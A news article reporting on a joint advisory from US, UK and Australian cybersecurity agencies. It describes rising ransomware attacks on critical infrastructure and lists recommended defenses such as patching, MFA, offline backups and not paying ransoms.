Cyber Agencies Warn: Ransomware Attacks Are Worse Than EverFollow Our Recommended Steps Now, Joint Advisory From Australia, UK and US Urges
Memo to businesses: Ransomware attacks are worse than ever, and unless you prepare, don't be surprised if you or your business is the next victim, warn government cybersecurity czars.
"In 2021, cybersecurity authorities in the United States, Australia, and the United Kingdom observed an increase in sophisticated, high-impact ransomware incidents against critical infrastructure organizations globally," says a joint advisory issued by all three countries' lead cybersecurity agencies.
More efforts are underway to now track, combat and mitigate groups that use ransomware. Even so, the latest view from the front lines is that extortionists wielding crypto-locking malware are continuing to take down numerous targets, with impunity. So organizations need to prepare now or get set to pay later.
To improve the cyber resiliency of domestic businesses, all three countries' governments have been focused on trying to ensure that senior executives and boards of directors review their organization's IT and cybersecurity postures. Government cybersecurity czars are urging them to ensure that at least the basics are being done correctly and to build from there.
"We live at a time when every government, every business, every person must focus on the threat of ransomware and take action to mitigate the risk of becoming a victim," says Jen Easterly, director of the U.S. Cybersecurity and Infrastructure Security Agency, aka CISA.
Critical Infrastructure Falling Victim
The joint alert notes that ransomware attacks have affected at least 14 of the 16 U.S. critical infrastructure sectors, which include communications, emergency water services, the energy sector and financial services. One of the most affected such sectors - despite whatever supposed promises criminals might offer, never mind the ongoing pandemic - continues to be healthcare.
Britain's National Cyber Security Center, or NCSC, which is part of the security, intelligence and cyber agency GCHQ, says ransomware is now the top threat facing British organizations, and the education sector has been particular hard hit.
The Australian Cyber Security Center, or ACSC, says the country's healthcare, financial services, higher education and research, and energy sectors have been hit especially hard.
Increasingly, ransomware is seen as a national security risk. Last summer, Conti-wielding attackers hit Ireland's national health service, while DarkSide-wielding attackers disrupted Colonial Pipeline, which is a major, privately owned business that distributes 45% of the fuel on the East Coast of the United States. Experts say it's not clear that attackers sought to disrupt any so-called critical infrastructure, but rather that these organizations just happened to fall victim. Nevertheless, the attacks respectively led to a disruption in patient care and the panic-buying of fuel.
Such attacks helped drive the U.S. and allies to retool their approach and devote more law enforcement and intelligence resources to track and disrupt ransomware operations, as well as attempt to identify and arrest perpetrators. In addition, greater resources - such as the joint alert and the guidance underpinning it - are being commissioned to help improve the cyber resiliency of domestic organizations. Diplomatic pressure is also being increased on countries seen as a safe haven for cybercriminals, such as Russia.
"When critical infrastructure is held at risk by foreign hackers operating from a safe haven in an adversary country, that's a national security problem," says Rob Joyce, cybersecurity director of the U.S. National Security Agency. "The ransomware scourge is a significant focus area for NSA as we generate insights alongside our partners. Network defenders should take action on the mitigations in the advisory."
Latest Look at Essential Defenses
Recommendations in the advisory address ensuring that basic-level defenses are in place. They include:
- Stay current: Keep all operating systems and software fully patched and up to date.
- Lock down remote access: Accessing poorly secured remote desktop protocol, or RDP, connections continues to be a very successful attack vector for gaining initial access to corporate networks.
- Train users: Together with RDP and exploiting unpatched flaws, phishing attacks remain a top attack tactic. Accordingly, an effective response must include education to "reinforce the appropriate user response to phishing and spear-phishing emails," the advisory says.
- Fewer administrators: Require the use of strong passwords for all accounts, minimize admin-level access to systems and use time-based access controls for granting temporary, privileged access, when required.
- Lock down Linux: "If using Linux, use a Linux security module - such as SELinux, AppArmor or SecComp - for defense in depth," the advisory says.
- Better authentication: Use multifactor authentication wherever feasible, but especially for critical systems, in case attackers steal the passwords they need to access them.
- Protect the cloud: "Backing up to multiple locations, requiring MFA for access, and encrypting data in the cloud" will help. Likewise, "if using cloud-based key management for encryption, ensure that storage and key administration roles are separated," the advisory says.
Whatever an organization does to improve its defenses, attackers will alter their approach to try and negate it, as the joint advisory details via the advice it offers for countering current attack strategies.
For example, it urges organizations to ensure that all backups are fully encrypted and that multiple copies are stored offline - meaning "physically disconnected" - as well as regularly tested and restored. "To further secure cloud backups, consider separation of account roles to prevent an account that manages the backups from being used to deny or degrade the backups should the account become compromised," it says.
Other advice focuses on segmenting networks, using end-to-end encryption, ensuring the security team is tracking "telemetry from cloud environments," investigating all abnormal activity, fully documenting all externally facing remote connections and disabling and monitoring for unneeded command-line utilities and scripting, among many other recommendations (see: Block This Now: Cobalt Strike and Other Red-Team Tools).
Prevention and Response: Dedicated Resources
Each of the countries behind the joint advisory offers a number of ransomware resources, including:
- Australia: ACSC's how to guard against ransomware and what to do if you are held to ransom;
- U.K.: NCSC's Ransomware Hub and a guide to reporting if you fall victim;
- U.S.: CISA's stopransomware.gov and Ransomware Readiness Assessment.
Those sites include resources for anyone who does fall victim. The advisory also urges victims to report all attacks, to help cybersecurity agencies better track the groups at work and the tactics they're using.
"Ransomware is a rising global threat with potentially devastating consequences but there are steps organizations can take to protect themselves," says Lindy Cameron, CEO of Britain's NCSC. "I strongly encourage U.K. CEOs and boards to familiarize themselves with this alert and to ensure their IT teams are taking the correct actions to bolster resilience."
Plea: Don't Pay Ransoms
The three countries' cybersecurity agencies also "strongly discourage paying a ransom to criminal actors," as they emphasize in the advisory. "Criminal activity is motivated by financial gain, so paying a ransom may embolden adversaries to target additional organizations - or re-target the same organization - or encourage cybercriminals to engage in the distribution of ransomware," they say.
"Paying the ransom also does not guarantee that a victim's files will be recovered," they add. "Additionally, reducing the financial gain of ransomware threat actors will help disrupt the ransomware criminal business model."